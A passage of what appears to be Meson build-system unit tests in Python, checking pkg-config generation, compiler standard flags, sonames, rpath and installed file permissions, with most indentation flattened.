if is_windows() or is_cygwin() or is_osx():
raise unittest.SkipTest('PIC not relevant')
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir)
compdb = self.get_compdb()
self.assertIn('-fPIC', compdb[0]['command'])
self.setconf('-Db_staticpic=false')
# Regenerate build
self.build()
compdb = self.get_compdb()
self.assertNotIn('-fPIC', compdb[0]['command'])
def test_pkgconfig_gen(self):
'''
Test that generated pkg-config files can be found and have the correct
version and link args. This can't be an ordinary test case because we
need to run pkg-config outside of a Meson build file.
https://github.com/mesonbuild/meson/issues/889
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
self.assertTrue(foo_dep.found())
self.assertEqual(foo_dep.get_version(), '1.0')
self.assertIn('-lfoo', foo_dep.get_link_args())
self.assertEqual(foo_dep.get_pkgconfig_variable('foo', {}), 'bar')
self.assertPathEqual(foo_dep.get_pkgconfig_variable('datadir', {}), '/usr/data')
libhello_nolib = PkgConfigDependency('libhello_nolib', env, kwargs)
self.assertTrue(libhello_nolib.found())
self.assertEqual(libhello_nolib.get_link_args(), [])
self.assertEqual(libhello_nolib.get_compile_args(), [])
def test_pkgconfig_gen_deps(self):
'''
Test that generated pkg-config files correctly handle dependencies
'''
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
privatedir1 = self.privatedir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': privatedir1})
privatedir2 = self.privatedir
env = {
'PKG_CONFIG_LIBDIR': os.pathsep.join([privatedir1, privatedir2]),
'PKG_CONFIG_SYSTEM_LIBRARY_PATH': '/usr/lib',
}
self._run(['pkg-config', 'dependency-test', '--validate'], override_envvars=env)
        # pkg-config strips some duplicated flags so we have to parse the
        # generated file ourselves.
expected = {
'Requires': 'libexposed',
'Requires.private': 'libfoo >= 1.0',
'Libs': '-L${libdir} -llibmain -pthread -lcustom',
'Libs.private': '-lcustom2 -L${libdir} -llibinternal',
'Cflags': '-I${includedir} -pthread -DCUSTOM',
}
if is_osx() or is_haiku():
expected['Cflags'] = expected['Cflags'].replace('-pthread ', '')
with open(os.path.join(privatedir2, 'dependency-test.pc')) as f:
matched_lines = 0
for line in f:
parts = line.split(':', 1)
if parts[0] in expected:
key = parts[0]
val = parts[1].strip()
expected_val = expected[key]
self.assertEqual(expected_val, val)
matched_lines += 1
self.assertEqual(len(expected), matched_lines)
cmd = ['pkg-config', 'requires-test']
out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'requires-private-test']
out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
if not is_openbsd():
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
else:
self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
cmd = ['pkg-config', 'pub-lib-order']
out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
self.assertEqual(out, ['-llibmain2', '-llibinternal'])
def test_pkgconfig_uninstalled(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
self.init(testdir)
self.build()
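# The meson-uninstalled directory holds pkg-config files that describe the
# not-yet-installed libraries straight from the build tree.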
os.environ['PKG_CONFIG_LIBDIR'] = os.path.join(self.builddir, 'meson-uninstalled')
if is_cygwin():
os.environ['PATH'] += os.pathsep + self.builddir
self.new_builddir()
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen', 'dependencies')
self.init(testdir)
self.build()
self.run_tests()
def test_pkg_unfound(self):
testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
self.init(testdir)
with open(os.path.join(self.privatedir, 'somename.pc')) as f:
pcfile = f.read()
self.assertNotIn('blub_blob_blib', pcfile)
def test_vala_c_warnings(self):
'''
Test that no warnings are emitted for C code generated by Vala. This
can't be an ordinary test case because we need to inspect the compiler
database.
https://github.com/mesonbuild/meson/issues/864
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '5 target glib')
self.init(testdir)
compdb = self.get_compdb()
vala_command = None
c_command = None
for each in compdb:
if each['file'].endswith('GLib.Thread.c'):
vala_command = each['command']
elif each['file'].endswith('GLib.Thread.vala'):
continue
elif each['file'].endswith('retcode.c'):
c_command = each['command']
else:
m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
raise AssertionError(m)
self.assertIsNotNone(vala_command)
self.assertIsNotNone(c_command)
# -w suppresses all warnings, should be there in Vala but not in C
self.assertIn(" -w ", vala_command)
self.assertNotIn(" -w ", c_command)
# -Wall enables all warnings, should be there in C but not in Vala
self.assertNotIn(" -Wall ", vala_command)
self.assertIn(" -Wall ", c_command)
# -Werror converts warnings to errors, should always be there since it's
# injected by an unrelated piece of code and the project has werror=true
self.assertIn(" -Werror ", vala_command)
self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
'''
Test that qt4 and qt5 detection with pkgconfig works.
'''
# Verify Qt4 or Qt5 can be found with pkg-config
qt4 = subprocess.call(['pkg-config', '--exists', 'QtCore'])
qt5 = subprocess.call(['pkg-config', '--exists', 'Qt5Core'])
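# subprocess.call() returns the exit status, so 0 means pkg-config found the module.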
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=pkg-config'])
# Confirm that the dependency was found with pkg-config
mesonlog = self.get_meson_log()
if qt4 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)\n')
if qt5 == 0:
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)\n')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
def test_qt5dependency_qmake_detection(self):
'''
Test that qt5 detection with qmake works. This can't be an ordinary
test case because it involves setting the environment.
'''
# Verify that qmake is for Qt5
if not shutil.which('qmake-qt5'):
if not shutil.which('qmake'):
raise unittest.SkipTest('QMake not found')
output = subprocess.getoutput('qmake --version')
if 'Qt version 5' not in output:
raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
# Disable pkg-config codepath and force searching with qmake/qmake-qt5
testdir = os.path.join(self.framework_test_dir, '4 qt')
self.init(testdir, extra_args=['-Dmethod=qmake'])
# Confirm that the dependency was found with qmake
mesonlog = self.get_meson_log()
self.assertRegex('\n'.join(mesonlog),
r'Run-time dependency qt5 \(modules: Core\) found: YES .* \((qmake|qmake-qt5)\)\n')
def _test_soname_impl(self, libpath, install):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
testdir = os.path.join(self.unit_test_dir, '1 soname')
self.init(testdir)
self.build()
if install:
self.install()
# File without aliases set.
nover = os.path.join(libpath, 'libnover.so')
self.assertPathExists(nover)
self.assertFalse(os.path.islink(nover))
self.assertEqual(get_soname(nover), 'libnover.so')
self.assertEqual(len(glob(nover[:-3] + '*')), 1)
# File with version set
verset = os.path.join(libpath, 'libverset.so')
self.assertPathExists(verset + '.4.5.6')
self.assertEqual(os.readlink(verset), 'libverset.so.4')
self.assertEqual(get_soname(verset), 'libverset.so.4')
self.assertEqual(len(glob(verset[:-3] + '*')), 3)
# File with soversion set
soverset = os.path.join(libpath, 'libsoverset.so')
self.assertPathExists(soverset + '.1.2.3')
self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
self.assertEqual(len(glob(soverset[:-3] + '*')), 2)
# File with version and soversion set to same values
settosame = os.path.join(libpath, 'libsettosame.so')
self.assertPathExists(settosame + '.7.8.9')
self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
self.assertEqual(len(glob(settosame[:-3] + '*')), 2)
# File with version and soversion set to different values
bothset = os.path.join(libpath, 'libbothset.so')
self.assertPathExists(bothset + '.1.2.3')
self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
self.assertEqual(len(glob(bothset[:-3] + '*')), 3)
def test_soname(self):
self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
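# Plain string concatenation is used here because self.prefix is absolute and
# os.path.join() would discard installdir in that case.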
libdir = self.installdir + os.path.join(self.prefix, self.libdir)
self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
'''
Test that compiler check flags override all other flags. This can't be
an ordinary test case because it needs the environment to be set.
'''
testdir = os.path.join(self.common_test_dir, '39 has function')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
Oflag = '-O3'
OflagCPP = Oflag
if cpp.get_id() in ('clang', 'gcc'):
# prevent developers from adding "int main(int argc, char **argv)"
# to small Meson checks unless these parameters are actually used
OflagCPP += ' -Werror=unused-parameter'
env = {'CFLAGS': Oflag,
'CXXFLAGS': OflagCPP}
self.init(testdir, override_envvars=env)
cmds = self.get_meson_log_compiler_checks()
for cmd in cmds:
if cmd[0] == 'ccache':
cmd = cmd[1:]
# Verify that -I flags from the `args` kwarg are first
# This is set in the '39 has function' test case
self.assertEqual(cmd[1], '-I/tmp')
# Verify that -O3 set via the environment is overridden by -O0
Oargs = [arg for arg in cmd if arg.startswith('-O')]
self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir, compiler, p: str):
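# The has_* flags below gate -std values that only newer compilers accept.
# _clang_at_least() appears to take separate minimum versions for upstream
# clang and for Apple (Xcode) clang, hence the two version strings.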
has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
# Check that all the listed -std=xxx options for this compiler work just fine when used
# https://en.wikipedia.org/wiki/Xcode#Latest_versions
# https://www.gnu.org/software/gcc/projects/cxx-status.html
for v in compiler.get_options()['std'].choices:
lang_std = p + '_std'
# Check the C++ variants first so that gnu++17/c++17 are matched before the
# C-only gnu17/c17 substrings.
if '++17' in v and not has_cpp17:
continue
elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
continue
# now C
elif '17' in v and not has_cpp2a_c17:
continue
elif '18' in v and not has_c18:
continue
std_opt = '{}={}'.format(lang_std, v)
self.init(testdir, extra_args=['-D' + std_opt])
cmd = self.get_compdb()[0]['command']
# c++03 and gnu++03 are not understood by ICC, don't try to look for them
skiplist = frozenset([
('intel', 'c++03'),
('intel', 'gnu++03')])
if v != 'none' and not (compiler.get_id(), v) in skiplist:
cmd_std = " -std={} ".format(v)
self.assertIn(cmd_std, cmd)
try:
self.build()
except Exception:
print('{} was {!r}'.format(lang_std, v))
raise
self.wipe()
# Check that an invalid std option in CFLAGS/CPPFLAGS fails
# Needed because by default ICC ignores invalid options
cmd_std = '-std=FAIL'
if p == 'c':
env_flag_name = 'CFLAGS'
elif p == 'cpp':
env_flag_name = 'CXXFLAGS'
else:
raise NotImplementedError('Language {} not defined.'.format(p))
env = {}
env[env_flag_name] = cmd_std
with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
msg='C compiler should have failed with -std=FAIL'):
self.init(testdir, override_envvars = env)
# ICC won't fail in the above because additional flags are needed to
# make unknown -std=... options errors.
self.build()
def test_compiler_c_stds(self):
'''
Test that C stds specified for this compiler can all be used. Can't be
an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cc, 'c')
def test_compiler_cpp_stds(self):
'''
Test that C++ stds specified for this compiler can all be used. Can't
be an ordinary test because it requires passing options to meson.
'''
testdir = os.path.join(self.common_test_dir, '2 cpp')
env = get_fake_env(testdir, self.builddir, self.prefix)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
self._test_stds_impl(testdir, cpp, 'cpp')
def test_unity_subproj(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir, extra_args='--unity=subprojects')
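# construct_id_from_path() rebuilds the unique target id (hash prefix plus
# target name and type suffix) that the backend uses as the per-target build
# subdirectory, so we can locate the generated unity sources.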
simpletest_id = Target.construct_id_from_path('subprojects/sublib', 'simpletest', '@exe')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', simpletest_id, 'simpletest-unity0.c'))
sublib_id = Target.construct_id_from_path('subprojects/sublib', 'sublib', '@sha')
self.assertPathExists(os.path.join(self.builddir, 'subprojects/sublib', sublib_id, 'sublib-unity0.c'))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
self.build()
def test_installed_modes(self):
'''
Test that files installed by these tests have the correct permissions.
Can't be an ordinary test because our installed_files.txt is very basic.
'''
# Test file modes
testdir = os.path.join(self.common_test_dir, '12 data')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'rw------T'
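# Compare permission bits only; the first character of filemode() output is
# the file type.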
self.assertEqual(want_mode, found_mode[1:])
f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-sr-x'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
self.assertEqual(0, statf.st_gid)
f = os.path.join(self.installdir, 'usr', 'share', 'progname',
'fileobject_datafile.dat')
orig = os.path.join(testdir, 'fileobject_datafile.dat')
statf = os.stat(f)
statorig = os.stat(orig)
found_mode = stat.filemode(statf.st_mode)
orig_mode = stat.filemode(statorig.st_mode)
self.assertEqual(orig_mode[1:], found_mode[1:])
self.assertEqual(os.getuid(), statf.st_uid)
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_gid)
self.wipe()
# Test directory modes
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
statf = os.stat(f)
found_mode = stat.filemode(statf.st_mode)
want_mode = 'rwxr-x--t'
self.assertEqual(want_mode, found_mode[1:])
if os.getuid() == 0:
# The chown failed nonfatally if we're not root
self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
'''
Test that files are installed with correct permissions using install_mode.
'''
testdir = os.path.join(self.common_test_dir, '195 install_mode')
self.init(testdir)
self.build()
self.install()
for fsobj, want_mode in [
('bin', 'drwxr-x---'),
('bin/runscript.sh', '-rwxr-sr-x'),
('bin/trivialprog', '-rwxr-sr-x'),
('include', 'drwxr-x---'),
('include/config.h', '-rw-rwSr--'),
('include/rootdir.h', '-r--r--r-T'),
('lib', 'drwxr-x---'),
('lib/libstat.a', '-rw---Sr--'),
('share', 'drwxr-x---'),
('share/man', 'drwxr-x---'),
('share/man/man1', 'drwxr-x---'),
('share/man/man1/foo.1', '-r--r--r-T'),
('share/sub1', 'drwxr-x---'),
('share/sub1/second.dat', '-rwxr-x--t'),
('subdir', 'drwxr-x---'),
('subdir/data.dat', '-rw-rwSr--'),
]:
f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(fsobj, want_mode, found_mode)))
# Ensure that introspect --installed works on all types of files
# FIXME: also verify the files list
self.introspect('--installed')
def test_install_umask(self):
'''
Test that files are installed with correct permissions using default
install umask of 022, regardless of the umask at the time the worktree
was checked out or the build was executed.
'''
# Copy source tree to a temporary directory and change permissions
# there to simulate a checkout with umask 002.
orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
# Create a new testdir under tmpdir.
tmpdir = os.path.realpath(tempfile.mkdtemp())
self.addCleanup(windows_proof_rmtree, tmpdir)
testdir = os.path.join(tmpdir, '26 install umask')
# Copy the tree using shutil.copyfile, which will use the current umask
# instead of preserving permissions of the old tree.
save_umask = os.umask(0o002)
self.addCleanup(os.umask, save_umask)
shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
# Preserve the executable status of subdir/sayhello though.
os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
self.init(testdir)
# Run the build under a 027 umask now.
os.umask(0o027)
self.build()
# And keep umask 027 for the install step too.
self.install()
for executable in [
'bin/prog',
'share/subdir/sayhello',
]:
f = os.path.join(self.installdir, 'usr', *executable.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(executable, want_mode, found_mode)))
for directory in [
'usr',
'usr/bin',
'usr/include',
'usr/share',
'usr/share/man',
'usr/share/man/man1',
'usr/share/subdir',
]:
f = os.path.join(self.installdir, *directory.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = 'drwxr-xr-x'
self.assertEqual(want_mode, found_mode,
msg=('Expected directory %s to have mode %s but found %s instead.' %
(directory, want_mode, found_mode)))
for datafile in [
'include/sample.h',
'share/datafile.cat',
'share/file.dat',
'share/man/man1/prog.1',
'share/subdir/datafile.dog',
]:
f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
found_mode = stat.filemode(os.stat(f).st_mode)
want_mode = '-rw-r--r--'
self.assertEqual(want_mode, found_mode,
msg=('Expected file %s to have mode %s but found %s instead.' %
(datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
testdir = os.path.join(self.unit_test_dir, '6 std override')
self.init(testdir)
compdb = self.get_compdb()
# Don't try to use -std=c++03 as a check for the
# presence of a compiler flag, as ICC does not
# support it.
for i in compdb:
if 'prog98' in i['file']:
c98_comp = i['command']
if 'prog11' in i['file']:
c11_comp = i['command']
if 'progp' in i['file']:
plain_comp = i['command']
self.assertNotEqual(len(plain_comp), 0)
self.assertIn('-std=c++98', c98_comp)
self.assertNotIn('-std=c++11', c98_comp)
self.assertIn('-std=c++11', c11_comp)
self.assertNotIn('-std=c++98', c11_comp)
self.assertNotIn('-std=c++98', plain_comp)
self.assertNotIn('-std=c++11', plain_comp)
# Now werror
self.assertIn('-Werror', plain_comp)
self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
if is_cygwin() or is_osx():
raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
testdir = os.path.join(self.unit_test_dir, '7 run installed')
self.init(testdir)
self.build()
self.install()
installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
installed_libdir = os.path.join(self.installdir, 'usr/foo')
installed_lib = os.path.join(installed_libdir, 'libfoo.so')
self.assertTrue(os.path.isfile(installed_exe))
self.assertTrue(os.path.isdir(installed_libdir))
self.assertTrue(os.path.isfile(installed_lib))
# Must fail when run without LD_LIBRARY_PATH to ensure that
# rpath has been properly stripped rather than pointing to the builddir.
self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
# When LD_LIBRARY_PATH is set it should start working.
# For some reason setting LD_LIBRARY_PATH in os.environ fails
# when all tests are run (but works when only this test is run),
# but doing this explicitly works.
env = os.environ.copy()
env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
self.assertEqual(subprocess.call(installed_exe, env=env), 0)
# Ensure that introspect --installed works
installed = self.introspect('--installed')
for v in installed.values():
self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
# NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
# the flags before returning them to -Lfoo -Lbar -lfoo -lbar
# but pkgconf seems to not do that. Sigh. Support both.
expected_order = [('-L/me/first', '-lfoo1'),
('-L/me/second', '-lfoo2'),
('-L/me/first', '-L/me/second'),
('-lfoo1', '-lfoo2'),
('-L/me/second', '-L/me/third'),
('-L/me/third', '-L/me/fourth',),
('-L/me/third', '-lfoo3'),
('-L/me/fourth', '-lfoo4'),
('-lfoo3', '-lfoo4'),
]
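# Look at the first linker line in build.ninja that mentions these flags and
# check that each pair appears in the expected relative order.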
with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
for line in ifile:
if expected_order[0][0] in line:
for first, second in expected_order:
self.assertLess(line.index(first), line.index(second))
return
raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
'''
Tests that mesonintrospect --dependencies returns expected output.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
self.init(testdir)
glib_found = False
gobject_found = False
deps = self.introspect('--dependencies')
self.assertIsInstance(deps, list)
for dep in deps:
self.assertIsInstance(dep, dict)
self.assertIn('name', dep)
self.assertIn('compile_args', dep)
self.assertIn('link_args', dep)
if dep['name'] == 'glib-2.0':
glib_found = True
elif dep['name'] == 'gobject-2.0':
gobject_found = True
self.assertTrue(glib_found)
self.assertTrue(gobject_found)
if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
targets = self.introspect('--targets')
docbook_target = None
for t in targets:
if t['name'] == 'generated-gdbus-docbook':
docbook_target = t
break
self.assertIsInstance(docbook_target, dict)
self.assertEqual(os.path.basename(docbook_target['filename'][0]), 'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
self.init(testdir)
install = self.introspect('--installed')
install = {os.path.basename(k): v for k, v in install.items()}
print(install)
if is_osx():
the_truth = {
'libmodule.dylib': '/usr/lib/libmodule.dylib',
'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
'libsome.dylib': '/usr/lib/libsome.dylib',
}
the_truth_2 = {'/usr/lib/libsome.dylib',
'/usr/lib/libsome.0.dylib',
}
else:
the_truth = {
'libmodule.so': '/usr/lib/libmodule.so',
'libnoversion.so': '/usr/lib/libnoversion.so',
'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
'libonlyversion.so': '/usr/lib/libonlyversion.so',
'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
'libsome.so': '/usr/lib/libsome.so',
'libsome.so.0': '/usr/lib/libsome.so.0',
'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
}
the_truth_2 = {'/usr/lib/libsome.so',
'/usr/lib/libsome.so.0',
'/usr/lib/libsome.so.1.2.3'}
self.assertDictEqual(install, the_truth)
targets = self.introspect('--targets')
for t in targets:
if t['name'] != 'some':
continue
self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
if is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
self.init(testdir)
self.build()
# C program RPATH
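# In the build tree the rpath should contain both the $ORIGIN entry for the
# library in sub/ and the user-supplied build_rpath; after installation only
# the install_rpath value should remain.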
build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
self.assertEqual(install_rpath, '/baz')
# C++ program RPATH
build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
self.install()
install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
self.assertEqual(install_rpath, 'baz')
@skip_if_not_base_option('b_sanitize')
def test_pch_with_address_sanitizer(self):
if is_cygwin():
raise unittest.SkipTest('asan not available on Cygwin')
if is_openbsd():
raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
testdir = os.path.join(self.common_test_dir, '13 pch')
self.init(testdir, extra_args=['-Db_sanitize=address', '-Db_lundef=false'])
self.build()
compdb = self.get_compdb()
for i in compdb:
self.assertIn("-fsanitize=address", i["command"])
def test_coverage(self):
gcovr_exe, gcovr_new_rootdir = mesonbuild.environment.detect_gcovr()
if not gcovr_exe:
raise unittest.SkipTest('gcovr not found')
if not shutil.which('genhtml') and not gcovr_new_rootdir:
raise unittest.SkipTest('genhtml not found and gcovr is too old')
if 'clang' in os.environ.get('CC', ''):
# We need to use llvm-cov instead of gcovr with clang
raise unittest.SkipTest('Coverage does not work with clang right now, help wanted!')
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir, extra_args=['-Db_coverage=true'])
self.build()
self.run_tests()
self.run_target('coverage-html')
def test_cross_find_program(self):
testdir = os.path.join(self.unit_test_dir, '11 cross prog')
crossfile = tempfile.NamedTemporaryFile(mode='w')
print(os.path.join(testdir, 'some_cross_tool.py'))
crossfile.write(textwrap.dedent('''\
[binaries]
c = '/usr/bin/{1}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
sometool.py = ['{0}']
someothertool.py = '{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7' # Not sure if correct.
endian = 'little'
''').format(os.path.join(testdir, 'some_cross_tool.py'),
'gcc' if is_sunos() else 'cc'))
crossfile.flush()
self.meson_cross_file = crossfile.name
self.init(testdir)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '13 reconfigure')
self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False)
self.build('reconfigure')
def test_vala_generated_source_buildir_inside_source_tree(self):
'''
Test that valac outputs generated C files in the expected location when
the builddir is a subdir of the source tree.
'''
if not shutil.which('valac'):
raise unittest.SkipTest('valac not installed.')
testdir = os.path.join(self.vala_test_dir, '8 generated sources')
newdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, newdir)
testdir = newdir
# New builddir
builddir = os.path.join(testdir, 'subdir/_build')
os.makedirs(builddir, exist_ok=True)
self.change_builddir(builddir)
self.init(testdir)
self.build()
def test_old_gnome_module_codepaths(self):
'''
A lot of code in the GNOME module is conditional on the version of the
glib tools that are installed, and breakages in the old code can slip
by once the CI has a newer glib version. So we force the GNOME module
to pretend that it's running on an ancient glib so the fallback code is
also tested.
'''
testdir = os.path.join(self.framework_test_dir, '7 gnome')
mesonbuild.modules.gnome.native_glib_version = '2.20'
env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"}
try:
self.init(testdir,
inprocess=True,
override_envvars=env)
self.build(override_envvars=env)
finally:
mesonbuild.modules.gnome.native_glib_version = None
@skipIfNoPkgconfig
def test_pkgconfig_usage(self):
testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency')
testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee')
if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL) != 0:
raise unittest.SkipTest('Glib 2.0 dependency not available.')
with tempfile.TemporaryDirectory() as tempdirname:
self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False)
self.install(use_destdir=False)
shutil.rmtree(self.builddir)
os.mkdir(self.builddir)
pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig')
self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc')))
lib_dir = os.path.join(tempdirname, 'lib')
myenv = os.environ.copy()
myenv['PKG_CONFIG_PATH'] = pkg_dir
# Private internal libraries must not leak out.
pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv)
self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.')
# Dependencies must not leak to cflags when building only a shared library.
